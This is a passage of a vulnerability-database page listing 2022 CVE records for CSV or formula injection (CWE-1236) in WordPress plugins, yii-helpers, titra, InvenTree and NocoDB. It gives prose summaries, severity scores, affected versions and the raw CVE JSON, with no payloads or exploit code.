CWE-1236
Improper Neutralization of Formula Elements in a CSV File
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
CVE-2022-1202 (GCVE-0-2022-1202)
Vulnerability from cvelistv5 – Published: 2022-06-13 12:41 – Updated: 2024-08-02 23:55
Title
WP-CRM <= 1.2.1 - CSV Injection
Summary
The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://wpscan.com/vulnerability/53c8190c-baef-48… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| Unknown | WP-CRM – Customer Relations Management for WordPress | Affected: 1.2.1, ≤ 1.2.1 (custom) |
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:55:24.229Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WP-CRM \u2013 Customer Relations Management for WordPress",
"vendor": "Unknown",
"versions": [
{
"lessThanOrEqual": "1.2.1",
"status": "affected",
"version": "1.2.1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ankur Bakre"
}
],
"descriptions": [
{
"lang": "en",
"value": "The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-13T12:41:41.000Z",
"orgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"shortName": "WPScan"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "WP-CRM \u003c= 1.2.1 - CSV Injection",
"x_generator": "WPScan CVE Generator",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "contact@wpscan.com",
"ID": "CVE-2022-1202",
"STATE": "PUBLIC",
"TITLE": "WP-CRM \u003c= 1.2.1 - CSV Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "WP-CRM \u2013 Customer Relations Management for WordPress",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "1.2.1",
"version_value": "1.2.1"
}
]
}
}
]
},
"vendor_name": "Unknown"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Ankur Bakre"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The WP-CRM WordPress plugin through 1.2.1 does not validate and sanitise fields when exporting people to a CSV file, leading to a CSV injection vulnerability."
}
]
},
"generator": "WPScan CVE Generator",
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a",
"refsource": "MISC",
"url": "https://wpscan.com/vulnerability/53c8190c-baef-4807-970b-f01ab440576a"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"assignerShortName": "WPScan",
"cveId": "CVE-2022-1202",
"datePublished": "2022-06-13T12:41:41.000Z",
"dateReserved": "2022-04-01T00:00:00.000Z",
"dateUpdated": "2024-08-02T23:55:24.229Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-1539 (GCVE-0-2022-1539)
Vulnerability from cvelistv5 – Published: 2022-07-25 12:46 – Updated: 2024-08-03 00:10
Title
Exports and Reports < 0.9.2 - Contributor+ CSV Injection
Summary
The Exports and Reports WordPress plugin before 0.9.2 does not sanitize or validate data when generating the CSV export, which could lead to CSV injection through Microsoft Excel's DDE function, or to data leakage via maliciously injected hyperlinks.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://wpscan.com/vulnerability/50f70927-9677-4b… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| Unknown | Exports and Reports | Affected: 0.9.2, < 0.9.2 (custom) |
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:10:03.492Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Exports and Reports",
"vendor": "Unknown",
"versions": [
{
"lessThan": "0.9.2",
"status": "affected",
"version": "0.9.2",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "websafe2021"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Exports and Reports WordPress plugin before 0.9.2 does not sanitize and validate data when generating the CSV to export, which could lead to a CSV injection, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-25T12:46:03.000Z",
"orgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"shortName": "WPScan"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Exports and Reports \u003c 0.9.2 - Contributor+ CSV Injection",
"x_generator": "WPScan CVE Generator",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "contact@wpscan.com",
"ID": "CVE-2022-1539",
"STATE": "PUBLIC",
"TITLE": "Exports and Reports \u003c 0.9.2 - Contributor+ CSV Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Exports and Reports",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "0.9.2",
"version_value": "0.9.2"
}
]
}
}
]
},
"vendor_name": "Unknown"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "websafe2021"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Exports and Reports WordPress plugin before 0.9.2 does not sanitize and validate data when generating the CSV to export, which could lead to a CSV injection, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks."
}
]
},
"generator": "WPScan CVE Generator",
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523",
"refsource": "MISC",
"url": "https://wpscan.com/vulnerability/50f70927-9677-4ba4-a388-0a41ed356523"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"assignerShortName": "WPScan",
"cveId": "CVE-2022-1539",
"datePublished": "2022-07-25T12:46:03.000Z",
"dateReserved": "2022-04-29T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:10:03.492Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-1544 (GCVE-0-2022-1544)
Vulnerability from cvelistv5 – Published: 2022-05-01 11:45 – Updated: 2024-08-03 00:10
Title
Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers
Summary
Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of the confidential data the file contains.
Severity
8 (High)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bd… | x_refsource_CONFIRM |
| https://github.com/luyadev/yii-helpers/commit/995… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| luyadev | luyadev/yii-helpers | Affected: unspecified, < 1.2.1 (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:10:02.924Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "luyadev/yii-helpers",
"vendor": "luyadev",
"versions": [
{
"lessThan": "1.2.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-01T11:45:12.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb"
}
],
"source": {
"advisory": "fa6d6e75-bc7a-40f6-9bdd-2541318912d4",
"discovery": "EXTERNAL"
},
"title": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-1544",
"STATE": "PUBLIC",
"TITLE": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "luyadev/yii-helpers",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "1.2.1"
}
]
}
}
]
},
"vendor_name": "luyadev"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4"
},
{
"name": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb",
"refsource": "MISC",
"url": "https://github.com/luyadev/yii-helpers/commit/9956ed63f516110c2b588471507b870e748c4cfb"
}
]
},
"source": {
"advisory": "fa6d6e75-bc7a-40f6-9bdd-2541318912d4",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-1544",
"datePublished": "2022-05-01T11:45:12.000Z",
"dateReserved": "2022-05-01T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:10:02.924Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2027 (GCVE-0-2022-2027)
Vulnerability from cvelistv5 – Published: 2022-06-08 08:35 – Updated: 2024-08-03 00:24
Title
Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra
Summary
Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0.
Severity
8 (High)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/kromitgmbh/titra/commit/e606b6… | x_refsource_MISC |
| https://huntr.dev/bounties/fb99c27c-7eaa-48db-be3… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| kromitgmbh | kromitgmbh/titra | Affected: unspecified, < 0.77.0 (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:24:44.064Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kromitgmbh/titra",
"vendor": "kromitgmbh",
"versions": [
{
"lessThan": "0.77.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-08T08:35:23.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d"
}
],
"source": {
"advisory": "fb99c27c-7eaa-48db-be39-b804cb83871d",
"discovery": "EXTERNAL"
},
"title": "Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-2027",
"STATE": "PUBLIC",
"TITLE": "Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "kromitgmbh/titra",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "0.77.0"
}
]
}
}
]
},
"vendor_name": "kromitgmbh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository kromitgmbh/titra prior to 0.77.0."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694",
"refsource": "MISC",
"url": "https://github.com/kromitgmbh/titra/commit/e606b674a2b7564407d89e38a341d72e22b14694"
},
{
"name": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/fb99c27c-7eaa-48db-be39-b804cb83871d"
}
]
},
"source": {
"advisory": "fb99c27c-7eaa-48db-be39-b804cb83871d",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-2027",
"datePublished": "2022-06-08T08:35:23.000Z",
"dateReserved": "2022-06-08T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:24:44.064Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2112 (GCVE-0-2022-2112)
Vulnerability from cvelistv5 – Published: 2022-06-17 10:15 – Updated: 2024-08-03 00:24
Title
Improper Neutralization of Formula Elements in a CSV File in inventree/inventree
Summary
Improper Neutralization of Formula Elements in a CSV File in GitHub repository inventree/inventree prior to 0.7.2.
Severity
9 (Critical)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/inventree/inventree/commit/26b… | x_refsource_MISC |
| https://huntr.dev/bounties/e57c36e7-fa39-435f-944… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| inventree | inventree/inventree | Affected: unspecified, < 0.7.2 (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:24:44.196Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "inventree/inventree",
"vendor": "inventree",
"versions": [
{
"lessThan": "0.7.2",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository inventree/inventree prior to 0.7.2."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-17T10:15:16.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73"
}
],
"source": {
"advisory": "e57c36e7-fa39-435f-944a-3a52ee066f73",
"discovery": "EXTERNAL"
},
"title": "Improper Neutralization of Formula Elements in a CSV File in inventree/inventree",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-2112",
"STATE": "PUBLIC",
"TITLE": "Improper Neutralization of Formula Elements in a CSV File in inventree/inventree"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "inventree/inventree",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "0.7.2"
}
]
}
}
]
},
"vendor_name": "inventree"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository inventree/inventree prior to 0.7.2."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f",
"refsource": "MISC",
"url": "https://github.com/inventree/inventree/commit/26bf51c20a1c9b3130ac5dd2e17649bece5ff84f"
},
{
"name": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73"
}
]
},
"source": {
"advisory": "e57c36e7-fa39-435f-944a-3a52ee066f73",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-2112",
"datePublished": "2022-06-17T10:15:16.000Z",
"dateReserved": "2022-06-17T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:24:44.196Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-22121 (GCVE-0-2022-22121)
Vulnerability from cvelistv5 – Published: 2022-01-10 15:25 – Updated: 2024-09-17 04:09
Title
NocoDB - CSV Injection in User Management
Summary
In NocoDB, versions 0.81.0 through 0.83.8 are affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged attacker can create a new table and inject payloads into its rows. When an administrator accesses the User Management endpoint, exports the data as a CSV file and opens it, the payload is executed.
Severity
8 (High)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/nocodb/nocodb/commit/079e3abe | x_refsource_MISC |
| https://www.whitesourcesoftware.com/vulnerability… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| nocodb | nocodb | Affected: 0.81.0 through ≤ 0.83.8 (custom) |
Date Public
2022-01-09 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:07:48.312Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "nocodb",
"vendor": "nocodb",
"versions": [
{
"lessThan": "unspecified",
"status": "affected",
"version": "0.81.0",
"versionType": "custom"
},
{
"lessThanOrEqual": "0.83.8",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "WhiteSource Vulnerability Research Team (WVR)"
}
],
"datePublic": "2022-01-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-01-10T15:25:28.000Z",
"orgId": "478c68dd-22c1-4a41-97cd-654224dfacff",
"shortName": "Mend"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
],
"solutions": [
{
"lang": "en",
"value": "Update to version 0.84.0 or later"
}
],
"source": {
"advisory": "https://www.whitesourcesoftware.com/vulnerability-database/",
"discovery": "UNKNOWN"
},
"title": "NocoDB - CSV Injection in User Management",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "vulnerabilitylab@whitesourcesoftware.com",
"DATE_PUBLIC": "2022-01-09T13:33:00.000Z",
"ID": "CVE-2022-22121",
"STATE": "PUBLIC",
"TITLE": "NocoDB - CSV Injection in User Management"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "nocodb",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_value": "0.81.0"
},
{
"version_affected": "\u003c=",
"version_value": "0.83.8"
}
]
}
}
]
},
"vendor_name": "nocodb"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "WhiteSource Vulnerability Research Team (WVR)"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236"
}
]
}
]
},
"references": {
"reference_data": [
{
